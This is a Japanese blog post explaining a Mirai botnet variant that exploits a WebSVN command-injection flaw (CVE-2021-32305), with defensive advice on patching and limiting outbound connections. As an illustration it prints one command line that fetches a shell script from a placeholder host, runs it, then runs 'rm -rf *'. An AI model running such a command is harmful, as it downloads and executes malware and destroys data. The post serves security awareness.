新種のMirai

新しいタイプのMiraiが確認されています。
今回はWebSVNの利用されている環境に対して作用します。
古いWebSVNには、受信した検索文字列をエスケープしない問題があります。
このため、攻撃者はWebSVNの動作する機器で任意のコマンドを実行することができます。
古いといっても2021年5月に提供されたバージョンよりも古いバージョンのお話です。

この脆弱性を悪用すると、任意の一連のコマンドが実行できますので、なんでもありです。
例えば、こんなこともできます。

• /bin/bash wget xxxxxx.xxxxx/xxxxx/abcde.sh; chmod 777 *sh; sh
  abcde.sh; rm -rf *

どこかからshell scriptをとってきて、それに実行権限を与えて、それを実行し、終わったらそれを削除しておく、
そんな内容です。
これは単に例です。
何でもできることは想像していただけたのではないでしょうか。

で、実際のInternet上で、この脆弱性を悪用した新しいタイプのMiraiの活動が観測されています。

前述の例の要領で、多くのファイルを持ってきて実行しています。
それらのファイルは実に12種もの異なるアーキテクチャ用のものとなっています。
MIPS、X86_64、ARM、POWERPC、SPARCなどです。
いかに広い範囲の環境がターゲットとなっているか、このアーキテクチャのラインアップを見るだけでも想像いただけるのではないでしょうか。

こういう方法ができますので、攻撃者は侵入先の環境がどのようなものであるのかを調査する必要がありません。
用意できたすべてのパターンを手当たり次第にやってみればよいのです。
簡単ですね。
攻撃者が楽できるということは、それだけ攻撃が広がりやすいということになります。

感染すると、その端末はMiraiボットネットの一部として、C2サーバからの依頼を受け付けることとなります。
これでその端末も攻撃者の一員です。
被害者端末は加害者端末へと変貌を遂げます。

この種の感染端末は、ポート666でC2への接続を試みます。
健全な環境ではすでにそうなっていると思いますが、外向けに接続可能な通信はきっちり管理して制限しておくことが必要です。

タイムリーなソフトウェアの更新や適切な機器の設定の維持など、やっているべき日々の運用を継続できていれば、防げる問題も多いのだと感じます。
継続は力なり、だと思いました。

参考記事（外部リンク）：New Mirai Variant Targets WebSVN Command Injection
Vulnerability (CVE-2021-32305)
unit42.paloaltonetworks.com/cve-2021-32305-websvn/